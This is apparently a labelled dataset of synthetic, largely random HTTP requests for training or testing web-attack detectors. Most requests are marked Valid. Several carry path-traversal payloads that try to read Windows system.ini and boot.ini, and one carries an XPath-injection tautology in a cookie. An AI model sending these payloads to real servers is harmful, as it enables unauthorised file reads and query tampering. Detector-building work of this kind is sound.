Cookie: tnyallolNsesvn=nrewuii7;GQAprocessing-instruction3jYsvdW=o|l1M2ewcei;iTooeraos=egLvcu;XdEformaU=tCM9zOq;_aad6azGin.u=e1El3leSrh
Cookie2: $Version="37"
Date: Wed, 19 Sep 07 11:14:31 UTC
ETag: W/"t15mmUNACPbF9yvF1h8d"
Expect: npeo
From: Hocan@osthutarg1.biz
If-Modified-Since: Tue, 24 Mar 09 19:28:45 UTC
If-Unmodified-Since: Sun, 27 Sep 09 12:15:29 UTC
If-Match: "jXVHc71lDooxOPY0GsKH"
If-None-Match: *
If-Range: *
Max-Forwards: 409
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Basic b3RUZ3Jtcjplcm9M
Authorization: NTLM cmllZWkzY3RpcnNldGlzZG93dGVlZWlvcjFub2RzdHRsUm1lZA==
Range: 189-,863-
Referer: /rthqj/tingnpr.jpg
TE: trailers
Trailer: Accept
User-Agent: Ynolrexr (r7zz4vkJAN; yJnt5uqpB)
UA-CPU: Sparc
UA-Disp: 519,575,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0764x660
Via: HTTP/3.2 200.100.236.172, i1t/6.7 48.142.249.33:18
Transfer-Encoding: compress
Upgrade: raife3/4.4, tde/7.8, hre/2.4, wcct/1.7
Warning: 770 123.137.130.236 "6enewerc5oeejdr" "Tue, 23 Aug 05 16:07:21 CET"
X-Forwarded-For: 73.70.52.35
X-Serial-Number: 026545042
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23107
Start - Id: 6519
class: Valid
POST /mt4ski7kSkUeVn7jEM/eidg/wBSHv4h9Ns9QuIz8TF9/aKTzYIR/rNZL45hHXp.VQseq/iealtzemr8i4p/gcxaeRufMdeauNHhci/2Znx0catmocha8frmnetcat0.gif? HTTP/1.1
Content-Length: 271
Content-Language: orrtp,tip
Content-Encoding: compress
Content-Location: http://8lr0.ch/8tay/ttarT/bsof/lqotCwi/u1ee.rar
Content-MD5: ZU44ZWV0eWV3bGNvY2VndA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 01 Mar 10 06:32:14 UTC
Last-Modified: Mon, 11 Oct 04 16:42:21 GMT
Host: 144.72.160.150
Connection: close
Accept: */*
Accept-Charset: windows-1254, windows-1252;q=0.4, iso-8859-15
Accept-Encoding: 
Accept-Language: edOr1-tlehu, ta0-rclten;q=0.2, 6dp9et-einn2ia;q=0.3, S-ogsno;q=0.0
Cache-Control: max-age=0
Client-ip: 20.19.52.211
Cookie: v1xowaubl3ilOoA=oeaotbo1plrndsove;aeedyie=<'7 r;inocnoayilo=samSnph-nRmi':k%'
Cookie2: $Version="25"
Date: Sun, 27 Apr 08 05:07:52 GMT
ETag: "yKqbnfWf7kS7zVdJhcWt"
Expect: ntnaeils
From: tqo1rst@zi3seoeo.st
If-Modified-Since: Sun, 14 Jan 07 04:11:00 GMT
If-Unmodified-Since: Wed, 24 Jan 07 19:48:15 GMT
If-Match: *
If-None-Match: "yyjgFyzEX-f@1@bZYV"
If-Range: "FXDUaTUzv12HD518IuJc"
Max-Forwards: 625
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: Basic b3RkdWM6ZXR2Zg==
Authorization: Digest uri=http://www.rpn0eiin.cz/eedt/ft7o/esRe/e2ite5o.jpg
Range: 0743-48
Referer: /erbtaZ/gTv2geo.asmx
TE: deflate
Trailer: Warning
User-Agent: Mozilla/5.8 (compatible; 7f4e4; Linux i586; bus54sbm)
UA-CPU: Sparc
UA-Disp: 574,841,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 9481x739
Via: FTP/5.4 www.D4tA.tiff, 6.4 186.214.207.51, 3.4 184.234.32.247
Transfer-Encoding: deflate
Upgrade: htm/7.1
Warning: 401 www.yflyvq.jpeg "rwrb3hyxExhn" 
X-Forwarded-For: 217.19.212.140
X-Serial-Number: 602584220
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

mifef=ateHiU seo6 t&Iaut0pee=ah6bmiehoeih&NwtBexTioein=493&geefoeirN=eoaggbnyoih7yjh&tenpmnroisaUzah=nhmnodeas1anisnui&iuoryyoTsAtsStf=80523963&otgln=9Fl@dV68&hdtl=6pj7gl&irol=096006&datbfobeoruqngd=jln&voctecrje=98628&ate7=804185841&Wua=28907&4k5dfgeeonrli=tqsk@erBM

End - Id: 6519
Start - Id: 15736
class: Valid
GET /fS/cjV94fYeltu2vI6Heed/uoRvoe6ceeth9h/mDaxNMADiKc/ttfzyisorhger1lde/C8hetsnuGnlSrhsueWhs/Mr/relsnctad.pl?msi=63968361&iTnEhlelp=-tao5rTD&htm=eLkx&othSookw=37&0a2zo=6985&wenhshtrRteUh=oADj2sHIP3yL&eWxguhhpt=1007960&sneiv=5412193270&nnBNiime3=paa%2Ft&Sobdh=zA&aaw0nterrenSk=%5Ct&cha6=Eoci%5CSqthkae HTTP/1.0
Host: www.lop3Sies.be:217
Connection: keep-alive
Accept: application/zip;q=0.5
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: s1He9-gd;q=0.2, fdsf0ocu-Onbtmtm, qlt-f4e;q=0.9, hFer2n0-ShsxEz;q=0.1, Gnxope-iitda
Cache-Control: max-stale
Client-ip: 86.42.199.9
Cookie: mrhino=Ncotn;itlvi2=raeyn6bnc3is qo=;anrnps=\9veo001;sfkiHh=nht5e8dodgthnqroe8;bt6ttarraidat=Q sa9angiu44%ufi||f;Btsqsefgr=teaPKgt@e0y
Cookie2: $Version="36"
Date: Tue, 01 Feb 05 14:07:56 UTC
ETag: "8ryMORi3UTFNv3v"
Expect: 100-continue
From: uvmHrh6n@nNnouty.biz
If-Modified-Since: Thu, 17 Apr 08 20:06:37 CET
If-Unmodified-Since: Tue, 04 Apr 06 03:17:47 GMT
If-Match: "39RyLyIFHaQuub9Q"
If-None-Match: *
If-Range: Fri, 26 May 06 08:35:46 UTC
Max-Forwards: 645
MIME-Version: 6.8
Pragma: t8nh0go='ta'
Proxy-Authorization: lihojw cfazeyii=eaiemae
Authorization: oJdm hwsurlyh=ntneerhh
Range: -6328,78162-3,153412-46
Referer: /ptabD.mspx
TE: gzip
Trailer: If-Unmodified-Since
User-Agent: Mozilla/3.1 (compatible; MSIE 5.5; Open BSD i386; yWq2ui8t)
UA-CPU: StrongARM
UA-Disp: 0822,807,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 516x1974
Via: 9.2 235.19.200.234:92
Transfer-Encoding: identity
Upgrade: ioeibb/4.8
Warning: 005 135.73.33.138 "yr2lt" 
X-Forwarded-For: 76.30.185.202
X-Serial-Number: 555023929683
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 15736
Start - Id: 9365
class: Valid
GET /HNO99FoIjohomeIBexec-/pzpBFjy7XlR/sni9jai6eztungv/h-Gftp.L6IkprmbPo/hqeaetzdNho.cfm? HTTP/1.1
Host: www.hrzn.de
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: cjs1-bttb, olo-qAriYhIE, noienb-zsf, ogwo-e;q=0.8
Cache-Control: no-store
Client-ip: 44.91.43.218
Cookie: n4x.c6JPvxterm7=h)StE9;tmpLtM5iqV=oTqhi
Cookie2: $Version="74"
Date: Sat, 18 Nov 06 06:22:14 GMT
ETag: W/"CQnNWluQ6CfqH.6A"
Expect: crsaehly
From: t6Lm@heimntd7sa.cz
If-Modified-Since: Thu, 25 Aug 05 23:03:12 UTC
If-Unmodified-Since: Sat, 22 Dec 07 20:53:11 GMT
If-Match: *
If-None-Match: "eSWXlLDIMjeL6tq"
If-Range: Mon, 03 Dec 07 08:26:48 UTC
Max-Forwards: 12
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: OdcSix ayHxs=easseTwo
Authorization: Basic bGhwZzo4ZWZhc3Rhbg==
Range: -38990,-9
Referer: /Emrn/m73atere/Basr/nhaaoa.mdb
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/1.5 (compatible; MSIE 9.7; Linux i386; iGto; thmiirt)
UA-CPU: Sparc
UA-Disp: 6680,235,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 4598x3959
Via: hsonl/9.7 172.25.173.253, 5.2 www.eoiea.jpeg:00191
Transfer-Encoding: Ronb
Upgrade: hjboe/9.5, sagma/5.2, rru/6.0, tTn/8.5
Warning: 782 1.21.166.132 "ddoam8pa2ee" "Mon, 28 Jun 04 14:04:38 UTC"
X-Forwarded-For: 74.205.168.33
X-Serial-Number: 169179883
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9365
Start - Id: 4739
class: Valid
POST /sglNny0eto/ZNwB139Xl6JbW/hpywjeuGx/ohcp/6h3IkhqxftpNG4/ad1cSrearje7dtmre/i6lWChaq1@varvbscriptm/LnMUMB3QrlinkT.css? HTTP/1.1
Content-Length: 66
Content-Language: aeefstNt
Content-Encoding: gzip
Content-Location: http://aena.gov/fBkyhs/srkc/jrNelfm/nat0/haodHej.nsf
Content-MD5: ZWNzc2NzZ3JzeU41ZWV0dA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 08 Sep 04 08:33:57 GMT
Last-Modified: Thu, 30 Jul 09 08:33:53 UTC
Host: www.brsn5Su1D.fr
Connection: oot52
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: max-age=14
Client-ip: 74.45.236.167
Cookie: ndjmel=xCoL53V;naelnaeaad=6292;4lwahfi6b9od=meilmrqellitg5;dwe4Dr40oxth=eEt@ddetw1r
Cookie2: $Version="84"
Date: Thu, 23 Jun 05 02:52:21 CET
ETag: "hcd0TXNtid0DB1VNJI6"
Expect: e2gZ
From: potNyp8h@nruv.uk
If-Modified-Since: Tue, 18 May 04 01:19:50 CET
If-Unmodified-Since: Sun, 26 Aug 07 05:02:57 GMT
If-Match: "KAVpVe0LQi9uBV-GQW0F"
If-None-Match: *
If-Range: "6.kVY6B1Y-4j1WEP6fCw"
Max-Forwards: 5
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: NTLM NmdycnBldm9hb3Z6Yml1bU00aWxjZWRzcmFyZGVlbGVFZXJ0YUN0Y2NlUXNu
Authorization: Basic Mm9lbjpUcnJ5MA==
Range: 066425-
Referer: http://gtaN.com/thmiPm/u6seUe/heja.tiff
TE: trailers,gzip;q=0.2
Trailer: Transfer-Encoding
User-Agent: Mozilla/6.7 (X11; U; Solaris 1.4; Ie-0d; rv:7.4.9) Gecko/39356800
UA-CPU: MIPS
UA-Disp: 377,5195,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 4366x138
Via: HTTP/3.0 www.etynoet4.jpg, HTTP/3.4 www.oowonoe.png, 3.0 100.236.46.238
Transfer-Encoding: identity
Upgrade: gto1/9.1, noos/2.9, su2trm/7.6, u0Ntk/3.5
Warning: 956 24.210.177.89 "qt9hoeeRnsan5aor" "Sat, 30 Sep 06 12:08:47 GMT"
X-Forwarded-For: 247.63.27.49
X-Serial-Number: 64993875
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

5SteweslNd=8370200&thcshe=6&il=f7a&D_2wS2f=nr&bi9slb5=s&sGtor=s-an

End - Id: 4739
Start - Id: 27860
class: Valid
GET /QeygdNswoo9Yni7hm0Gj/tQNgfXzH52cZTBX4X-/lC/rzB.L@msm/0BZK8X5LeqS-ng6/aQKi/sbe3/nAtuJw3/gMH/iUTpeYQAR6j.pl?Raln=415178&0sinPDmH=ewpCgx0S&si6DelOe0tirva=908483&hltilgc3Ennasi=utnisHe5r4i&eqQtoEm=u4z&DdivRcmdUcN6Nb-=topte7n&md8e3chernymn=53&o6r=leeAwherelocationgi+skt9s&efix=690&nShsantldiwtIS=bayu&nah87e3fe0e=euscprocessing-instruction HTTP/1.0
Host: www.teue.com
Connection: close
Accept: text/html
Accept-Charset: cp-932, x-mac-arabic, iso-8859-7
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=6
Client-ip: 202.94.102.161
Cookie: hpeihf0let=orh;fdtanus=njb
Cookie2: $Version="757"
Date: Sun, 28 Jun 09 21:54:10 GMT
ETag: W/"r1pV2nzMHWVoX_Rcg"
Expect: 100-continue
From: iIjd@CLYb5so1.org
If-Modified-Since: Tue, 07 Aug 07 09:55:01 CET
If-Unmodified-Since: Tue, 20 Mar 07 21:10:44 UTC
If-Match: "JopLzwIkSQX3VMyv"
If-None-Match: ".9o74jPzAXr1k-1"
If-Range: Sat, 12 May 07 02:55:10 GMT
Max-Forwards: 97
MIME-Version: 9.9
Pragma: ahE9t='swutNo'
Proxy-Authorization: NTLM Mk9wMWVpbmFkbW95cWlhdXRndzduaXljNmd6cWV3bmNvT2hD
Authorization: ya1a iooNfsma=tht3nei
Range: -2,17-1694,303-9
Referer: http://fwtc3i.gov/iIrtc/tpXl/3nit.swf
TE: deflate,trailers
Trailer: Referer
User-Agent: Mozilla/0.4 (compatible; Konqueror/9.2; Windows NT; ciFe3; k3va; tmnhll1)
UA-CPU: MIPS
UA-Disp: 0211,623,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 0689x744
Via: 4.0 242.63.144.191, eevit/5.2 www.8flot3ie.html:5558
Transfer-Encoding: compress
Upgrade: u5mq12/7.0, Pdmae/4.0, ydahC3/6.1
Warning: 085 99.23.2.41 "ihee9hbsteh40fi" 
X-Forwarded-For: 122.11.217.222
X-Serial-Number: 92325368257
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27860
Start - Id: 45944
class: PathTransversal
GET /aiUEN/z3m2sY/iq9mb3qPKO/aEj/5gn0a/27mE/DJaSrTthzeowtcraeb/ypeoHhN/xOnepUnoohnltvis/Tii5o.exe?yhveF5eefoosqb=%24mlV%3Ae&MdYnullDrgv=s%3A%5Cwindows%5Cboot.ini&r8pZ6access_logrchTC=lejs0aEusei&wzii=oxmles+t+e HTTP/1.1
Host: www.aa4lto8.net
Connection: close
Accept: */*;q=0.5
Accept-Charset: x-mac-turkish;q=0.5, cp-932;q=0.0, euc-kr;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=75637
Client-ip: 81.34.102.44
Cookie: lyThsycaoua=achildeiQ3eval;lerree=56417288
Cookie2: $Version="94"
Date: Sun, 15 Feb 04 06:01:57 CET
ETag: "HSlLUZs3qF9UWKYK"
Expect: 100-continue
From: cpanabu8@leeWhlh.biz
If-Modified-Since: Sun, 15 Jan 06 24:41:05 CET
If-Unmodified-Since: Sat, 08 Jul 06 21:39:45 GMT
If-Match: "8O_Jry8.AItLI7WdtC@"
If-None-Match: "8.XDWPTwApOF2QH4@E"
If-Range: Tue, 07 Sep 04 05:31:28 UTC
Max-Forwards: 2
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: atacrJ nOIndN=dosn6sfe
Authorization: Hh8ljl hkHpI=asiyO
Referer: http://www.mVett.uk/detopca/ieya/elry/ea9u/6eeeef4.htm
TE: trailers
Trailer: Accept
User-Agent: thc8/3.7.7.7.7
UA-Disp: 3135,8994,8
UA-OS: Windows NT
Via: 8.5 www.ardtowa4.gif
Transfer-Encoding: gzip
Upgrade: Hne/9.3, keht/9.7, eldt/7.3, tlenn/6.0
Warning: 240 244.77.211.173 "osnMh" 
X-Forwarded-For: 226.91.8.34
X-Serial-Number: 15666151508879935432
----: -----------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 45944
Start - Id: 45832
class: PathTransversal
GET /mxoycnszho/ugHeRltiee/manR4nzromeOnlmrs/EJ3tbcopygOX/qt7dht/pITDDnVv5r./hBv/bzQqBZv8-QNzmo2tnj/ehi/aGVcJdVh.dll?i9yiC=ynlrauw2py&nrnae=eeee&dd3re=abf+eo&hlrlsTga=ayjY&tw=t1OyKq5%40&efdloXsnOjRbnry=..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&av0=40 HTTP/1.0
Host: 162.135.156.88
Connection: keep-alive
Accept: audio/*
Accept-Charset: windows-1253, x-mac-japanese;q=0.1, isiri-3342, iso-8859-3, iso-2022-kr
Accept-Encoding: *;q=0.6
Accept-Language: rahred-33n;q=0.7, sgcesela-atgoniwn;q=0.0, bo5ger-rert;q=0.3
Cache-Control: no-transform
Client-ip: 56.249.214.170
Cookie: hnretoc1ne=$fiueAllogwindow.openuetce 0dt;bsu=800;tthsaxcere4mc=IPltPle;ssttse2=AAg2rt5notdwm;tsfohlb86y=etmpidoetsu
Cookie2: $Version="38"
Date: Sun, 08 Oct 06 20:14:44 GMT
ETag: W/"s1@MrC7fOnRr82y"
Expect: tons32
From: ix4abcph@mnt9ssu.gov
If-Modified-Since: Sun, 06 Aug 06 08:42:43 UTC
If-Unmodified-Since: Sat, 26 May 07 01:41:56 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 04 Apr 10 13:33:34 CET
Max-Forwards: 9
MIME-Version: 9.7
Pragma: tV='Yrdti'
Proxy-Authorization: Digest uri=http://www.ncrl8sh.ch/2nled.asp
Authorization: Basic b3llM2loamk6dGUzb3Rhcw==
Range: 630885-42,812-,31038-
Referer: /dnzhoe3/ydeoah/mimnDqi/lempu9it.jsp
TE: gzip;q=0.0,deflate;q=0.8,gzip;q=0.3
Trailer: Transfer-Encoding
User-Agent: Mozilla/5.7 (X11; U; SunOS sun4u 4.4; iE-te; rv:0.1.3) Gecko/11052033
UA-CPU: MIPS
UA-Color: color8
UA-Pixels: 861x425
Via: HTTP/5.5 www.hnrenne.png, FTP/9.9 www.0mda.jpeg:63542
Transfer-Encoding: compress
Upgrade: osu6/8.7, l2hene/7.8, eas/3.6, aeor6c/3.1
Warning: 945 4.66.74.136 "n7nhehqedexmd" "Sat, 22 Aug 09 11:03:47 GMT"
X-Serial-Number: 25397478987579
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45832
Start - Id: 8996
class: Valid
GET /xPOOlDNBIVLAkdN6V6Y/Rls9blddWu/eeiiseihiEYCemig6TE/olnchdnpds/rIlsjfaeCddni/iL0cg7KlSn2gK.mspx? HTTP/1.1
Host: 202.31.42.94
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: euc-kr;q=0.1, macintosh, cp-936, iso-8859-5
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 89.96.201.213
Cookie: 40jsys=dOpm0IGFl48;aEaolzfciwu= l;whem=z_H_9ECvw@PE
Cookie2: $Version="498"
Date: Sat, 30 Dec 06 20:09:47 GMT
ETag: W/"tITEZe2a@b90OdzSpI@"
Expect: Urei=rrtrdo;nrc7
From: lstucdNi@eei2smta.net
If-Modified-Since: Fri, 16 Mar 07 11:34:46 CET
If-Unmodified-Since: Wed, 23 Apr 08 12:07:36 GMT
If-Match: *
If-None-Match: "ErN8kPD4brqfVPR5-R"
If-Range: "tEdesZDdUJDhmB5rk"
Max-Forwards: 43
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: lsSh2 t9tteeo=y7a2ree
Authorization: NTLM YmdVTG9pdGFpdjhyY29UY2xlc2dIMjlsNGhlcmhvZWl0YVY5dGhpMHJtY25IbVI=
Range: 083-
Referer: /pl1dea/xlkrogny.gif
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/2.4 (X11; U; Linux i386 5.9; ui-oi; rv:7.1.2) Gecko/51420172
UA-CPU: MIPS
UA-Disp: 7331,790,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 7350x9086
Via: 9.9 237.84.219.79
Transfer-Encoding: compress
Upgrade: t7hloe/9.4, 2ku9/0.5, egeiae/4.4
Warning: 247 www.nekn6rAe.htm "a78cpakr" "Tue, 30 Jan 07 10:22:39 CET"
X-Forwarded-For: 253.252.174.31
X-Serial-Number: 92954758156
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8996
Start - Id: 1003
class: Valid
GET /fnijsvtTssefnit1ge.mspx?dn=9&t13re=60125297&t8=02&sra=se&R4rRyG0opt=http0DsbZ%3CObwor&cuOlTnev=13&shhiaael=313&tikto=lrHTp4&3uaetnnionhId89=4904 HTTP/1.1
Host: 36.117.207.9
Connection: insp1x
Accept: application/*;q=0.5, application/zip;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 174.40.171.214
Cookie: TeietnidooE=toe$e;dlezo=949
Cookie2: $Version="125"
Date: Tue, 16 Jun 09 18:22:08 CET
ETag: W/"5AKGOuD@bFaR58.vK5-Q"
Expect: 100-continue
From: iaaeh@rEee.it
If-Modified-Since: Mon, 21 Sep 09 06:51:51 UTC
If-Unmodified-Since: Thu, 20 Dec 07 05:43:45 UTC
If-Match: "57DIyWovg9vw8aeeb"
If-None-Match: *
If-Range: *
Max-Forwards: 8
MIME-Version: 5.1
Pragma: Oezlrwoh='oqehvl'
Proxy-Authorization: Basic aXNqdWU6b2hhZWlhc2M=
Authorization: Digest algorithm=MD5
Range: 726319-,933-
Referer: http://www.9rtjd.st/uhmlonYs.txt
TE: gzip
Trailer: Cache-Control
User-Agent: Mozilla/8.0 (compatible; onzssage3; Windows NT; tcuets; cTsroir; sobtsoihtn)
UA-CPU: MIPS
UA-Disp: 419,762,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 5033x777
Via: 2.7 www.tgtneke.jpg:7, 3.1 www.tr1Sei.shtml, 0.1 www.bjEv.jpeg
Transfer-Encoding: identity
Upgrade: ebapin/6.4, ayia/5.9, olrerN/7.3, ohegm/8.7, el6a/4.8
Warning: 561 123.33.248.80 "ohsncetm" 
X-Forwarded-For: 162.75.24.52
X-Serial-Number: 90115734669182651364
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1003
Start - Id: 48479
class: XPathInjection
GET /BtQyVTwlsALM/T7sit6setjochdfdydio/ikt4htl/cyDrI/childGC92d@3Wtmp90PU/sXla.i/nS0o/xiaroeSooewe3t3th/ocALZs3.asp?cm2wn=21&nsrdbscd=iwgeLCyAetttre&schqraEwsrdhsdt=837 HTTP/1.0
Host: 119.206.143.82:80
Connection: keep-alive
Accept: application/rtf, image/*;q=0.7, audio/basic
Accept-Encoding: 
Accept-Language: xaYcasan-le;q=0.9, ny-oot;q=0.4, n-5aru;q=0.4, aEp-Ezler;q=0.4
Cookie: 4.FY1L2b2tqc=vilgtrht' or    (i    <    count(iTdtcv/child::text())     and j  <    count(olo/child::comment())     and    k     < count(v6/child::*)    )     or 'ee'    =  '  blef'   or
Date: Wed, 18 May 05 03:27:49 UTC
Expect: 100-continue
Pragma: palsh='Otrr0q'
Referer: /cCtda/l9Bsa/e4affr1.zip
User-Agent: iiokftd (epMIw8A0TO)
Transfer-Encoding: gzip
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48479
Start - Id: 22890
class: Valid
GET /mERhwhjJmK@38Vpq/SRYjjuFA.cmd/riigqt5gP19MShhTfR0S/QPC/eZTL2.7X8CeUxngqZ0x.swf?rrk=Rzt&y0pnbliua27=o6hrnx&3otUwex7q=aisuaz%3Cservices&h1Ssaece=0oatwaNpcah&Ng9ejw6ldstdhSl=44608253&Ynbritqo68e=351&naEco=10OqRD&5_Dx=bN8oa3e9aS&mp1b=grmhdtoarlds&oh=050293&tarao4ohasAh4ny=oZvF07z HTTP/1.0
Host: 241.101.165.241
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-cyrillic;q=0.4, x-mac-japanese;q=0.3, iso-2022-kr, euc-tw;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: max-age=6
Client-ip: 250.14.63.166
Cookie: uhoahmgSDeuyq=9rsowiiu;weDy06adhtjhi= eser;ssdfs2kEmsetns=cyehstyle;lsiexeccsYeT=cgJYHXynQP.b
Cookie2: $Version="955"
Date: Fri, 24 Nov 06 23:10:00 CET
ETag: W/"ME6FG0_9uGnLRWBoQDlI"
Expect: 100-continue
From: aseiiog@zr5aou.org
If-Modified-Since: Thu, 27 Jul 06 09:21:30 UTC
If-Unmodified-Since: Thu, 17 Apr 08 24:49:57 CET
If-Match: "V4h95rkLbI2AKF@"
If-None-Match: *
If-Range: Wed, 26 Jul 06 08:45:48 CET
Max-Forwards: 637
MIME-Version: 2.2
Pragma: dcFiet=seihaLer
Proxy-Authorization: Digest response="D5eE089E6EEFdcB7A2271Cf2fC0Fc032"
Authorization: Digest uri=/r6tyq/IhiU/7aatae/3lqtunr/ggm4r3ea.exe
Range: 37032-5753,-977
Referer: /2nqsnx/EgrJ/efdzhorl/hrca3tno.bin
TE: chunked,chunked;q=0.2,chunked;q=0.1
Trailer: Trailer
User-Agent: rifIEyant (cuNkaDDI1; tdLD2hY; e@a83ukaV; p8fK4D; ePxRsQKX)
UA-CPU: MIPS
UA-Disp: 3881,209,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 301x6303
Via: 4.7 www.ecoic.htm, 3.4 211.122.188.201
Transfer-Encoding: tx4f; eCEwipyw=aeapi2l
Upgrade: rhued/7.4
Warning: 186 www.oodtiw.shtml "0e81oio" "Wed, 24 Jun 09 07:13:01 GMT"
X-Forwarded-For: 49.248.212.8
X-Serial-Number: 426023548
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22890
Start - Id: 7550
class: Valid
PUT /Sp-J0_Er.tiff? HTTP/1.0
Content-Length: 95
Content-Language: m
Content-Encoding: deflate
Content-Location: /tsfed/j8tsI2r.pl
Content-MD5: cWl5YWQ1TExhenRUY2xvZg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 12 Jun 09 15:58:04 GMT
Last-Modified: Tue, 03 Oct 06 04:52:43 UTC
Host: www.O4e8nr1et.cz
Connection: liun6
Accept: application/*, video/*;q=0.1
Accept-Charset: koi8;q=0.1
Accept-Encoding: *
Accept-Language: o-itmnao5
Cache-Control: no-store
Client-ip: 13.235.197.251
Cookie: lt=5;Z@eQL=071;-5JFqzBn7=i35B0ot;oltNrnt=9103345;si23m9wWthaelM=09955657
Cookie2: $Version="8"
Date: Sun, 14 Feb 10 24:59:23 UTC
ETag: W/"R.aisbSEVR_HgA0N"
Expect: jh9wceix=inmii;Rreo=wjhit
From: nanSyva@xAweeehqTs.de
If-Modified-Since: Sun, 30 Aug 09 18:40:32 UTC
If-Unmodified-Since: Thu, 08 Jan 04 07:46:45 GMT
If-Match: "oZXk7vg5OefTZLeCv"
If-None-Match: *
If-Range: "4WIauTSqb1ryBhDJn4"
Max-Forwards: 1600
MIME-Version: 1.7
Pragma: ha=emin
Proxy-Authorization: NTLM d2llb2V3b3ZodXNkb3RkVGFFaGJoMHFsbnVxbG1hbXQyc2V6b2hoYQ==
Authorization: Basic YmVpMXA6RWdydGhpYQ==
Range: 31105-
Referer: http://deoa8nc.biz/odrn3deh/hBtgua/6t2m6/oytom0.doc
TE: chunked
Trailer: Via
User-Agent: Mozilla/5.4 (Machintosh; U; PPC 8.0; ee-nr; rv:8.3.1) Gecko/56845727
UA-CPU: x86
UA-Disp: 845,5230,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 8581x949
Via: 3.8 225.170.14.136, FTP/5.9 www.neaiut.png
Transfer-Encoding: xma8
Upgrade: Tbwl/8.0, e3IaS/2.0
Warning: 554 www.d4nu.html "eitMhs2Scmrexg1r" "Tue, 13 Jan 04 16:21:13 GMT"
X-Forwarded-For: 191.61.229.46
X-Serial-Number: 49024
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

gn2n4na7e=nfL&ihgtamjed=nte&otcntuoaa1sn=5T&Lyr=ndCm0Oig&qenmina9lNtls9s=8031&tmpg1mail=9276543

End - Id: 7550
Start - Id: 673
class: Valid
GET /lrI-aDQxK4M14ugRlL/QI/sQX.YCjQ3@/Aalxmtov0yebokhjikW/LmfrSroeqposowih.exe? HTTP/1.0
Host: www.rsoet8en.uk
Connection: keep-alive
Accept: image/*, video/quicktime
Accept-Charset: euc-tw;q=0.1, iso-8859-7, utf-7, koi8-r;q=0.7
Accept-Encoding: compress, identity, deflate;q=0.7, compress;q=0.4
Accept-Language: cidOdecn-ttmslski;q=0.9, ieesaw-boHlh, sC-knhiEo
Cache-Control: only-if-cached
Client-ip: 177.244.253.103
Cookie: yl9vz9gdaoeSh=1
Cookie2: $Version="173"
Date: Tue, 15 Nov 05 16:01:59 UTC
ETag: W/"t5HiJ77CO5W3x64sd"
Expect: e4nae=aegu
From: i4suSHw@tttnzs.org
If-Modified-Since: Tue, 18 Oct 05 13:32:51 GMT
If-Unmodified-Since: Tue, 10 Feb 04 11:29:50 CET
If-Match: "isQ.3hh0cDZMLcYu"
If-None-Match: "pk6-n2rlZcAL8TfXuh3"
If-Range: Sat, 31 Jan 04 18:41:49 CET
Max-Forwards: 53
MIME-Version: 1.6
Pragma: wwia='rcy'
Proxy-Authorization: Digest cnonce="0eSci"
Authorization: Basic bnRzMmF0cjptN3NucjU=
Range: -7,9185-99305,64-211014
Referer: http://igonvn.org/3rnce/krre.txt
TE: deflate;q=0.8,trailers
Trailer: Transfer-Encoding
User-Agent: smKsmxmp/7.5
UA-CPU: MIPS
UA-Disp: 667,0755,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 865x334
